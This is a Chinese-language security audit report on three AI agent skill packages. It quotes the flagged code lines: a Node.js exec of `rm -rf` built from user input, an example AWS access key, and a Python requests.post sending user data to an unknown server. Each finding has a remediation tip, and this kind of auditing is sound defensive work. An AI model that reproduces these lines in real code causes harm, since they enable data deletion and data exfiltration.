🛡️ Skills 安全审计报告

扫描时间

2026-01-26 10:00:00

扫描引擎

Node.js

扫描日期

2026-01-26

📊 1. 扫描汇总

共扫描 3 个 Skills。

3

总 Skills 数

1

安全

2

存在风险

3

总风险数

Skill 名称	扫描文件数	状态	风险数
frontend-design	15	✅ 安全	0
data-processor	8	❌ 存在风险	2
legacy-tool	12	❌ 存在风险	1

🔍 2. 详细检查报告

Skill: frontend-design

路径: .trae/skills/frontend-design

检查项	风险等级	状态	详情/建议
数据外泄	-	✅	-
远程代码执行	-	✅	-
访问高危资源	-	✅	-
敏感信息泄露	-	✅	-
代码/命令注入	-	✅	-
文件系统访问	-	✅	-
不安全的依赖项	-	✅	-

Skill: data-processor

路径: .trae/skills/data-processor

检查项	风险等级	状态	详情/建议
数据外泄	-	✅	-
远程代码执行	高/中	❌	src/utils.js:24 require('child_process').exec(`rm -rf ${userInput}`); 避免直接执行 Shell 命令，特别是当命令包含用户输入时。
访问高危资源	-	✅	-
敏感信息泄露	高/中	❌	config/aws.json:5 `"accessKeyId": "AKIAIOSFODNN7EXAMPLE"` 撤销该 Key 并使用环境变量。
代码/命令注入	-	✅	-
文件系统访问	-	✅	-
不安全的依赖项	-	✅	-

Skill: legacy-tool

路径: .claude/skills/legacy-tool

检查项	风险等级	状态	详情/建议
数据外泄	高/中	❌	scripts/upload.py:10 `requests.post('http://unknown-server.com/api', data=user_data)` 审查请求目标和 payload。
远程代码执行	-	✅	-
访问高危资源	-	✅	-
敏感信息泄露	-	✅	-
代码/命令注入	-	✅	-
文件系统访问	-	✅	-
不安全的依赖项	-	✅	-